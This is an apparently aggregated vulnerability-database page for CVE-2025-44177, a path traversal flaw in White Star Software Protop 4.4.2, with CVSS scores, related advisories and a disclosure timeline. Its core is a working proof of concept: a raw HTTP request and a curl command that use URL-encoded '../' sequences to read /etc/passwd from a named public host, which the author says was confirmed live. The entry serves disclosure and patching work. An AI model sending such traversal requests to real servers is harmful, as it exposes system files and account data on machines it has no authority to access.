Vulners
Lucene search
๐ White Star Software Protop 4.4.2-2024-11-27 Local File Inclusion
๐๏ธย 16 Jul 2025ย 00:00:00Reported byย Imraan KhanTypeย 
ย packetstorm๐ย packetstorm.news๐ย 86ย Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2025-44177 | 1 Jul 202518:26 | โ | circl |
 | White Star Software Protop ่ทฏๅพ้ๅๆผๆด | 9 Jul 202500:00 | โ | cnnvd |
 | CVE-2025-44177 | 9 Jul 202500:00 | โ | cve |
 | CVE-2025-44177 | 9 Jul 202500:00 | โ | cvelist |
 | White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI) | 16 Jul 202500:00 | โ | exploitdb |
 | EUVD-2025-20833 | 3 Oct 202520:07 | โ | euvd |
 | White Star Software ProTop - Directory Traversal | 3 Jun 202606:04 | โ | nuclei |
 | CVE-2025-44177 | 9 Jul 202516:15 | โ | nvd |
 | Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check | 22 Jul 202100:00 | โ | openvas |
 | CVE-2025-44177 | 9 Jul 202516:15 | โ | osv |
10
# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
# Date: 2025-07-09
# Exploit Author: Imraan Khan (Lich-Sec)
# Vendor Homepage: https://wss.com/
# Software Link: https://client.protop.co.za/
# Version: v4.4.2-2024-11-27
# Tested on: Ubuntu 22.04 / Linux
# CVE: CVE-2025-44177
# CWE: CWE-22 - Path Traversal
# Description:
# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2.
# An unauthenticated remote attacker can retrieve arbitrary files via
# URL-encoded traversal sequences in the `/pt3upd/` endpoint.
# Vulnerable Endpoint:
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: client.protop.co.za
User-Agent: curl/8.0
Accept: */*
# Example curl command:
curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'
# Notes:
# - Vulnerability confirmed on public instance at time of testing.
# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
# - The vendor was notified and a fix was issued.
# Disclosure Timeline:
# - Discovered: 2025-03-13
# - Disclosed to vendor: 2025-03-20
# - CVE Assigned: 2025-07-01
# - Public Disclosure: 2025-07-09Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jul 2025 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.18.2
EPSS0.09273
SSVC